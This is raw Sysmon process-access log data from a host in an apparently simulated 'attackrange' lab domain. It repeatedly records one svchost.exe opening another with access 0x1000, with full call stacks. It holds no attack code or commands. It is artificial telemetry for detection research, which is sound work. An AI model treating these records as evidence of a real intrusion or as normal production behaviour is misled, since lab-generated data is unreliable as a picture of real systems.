12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 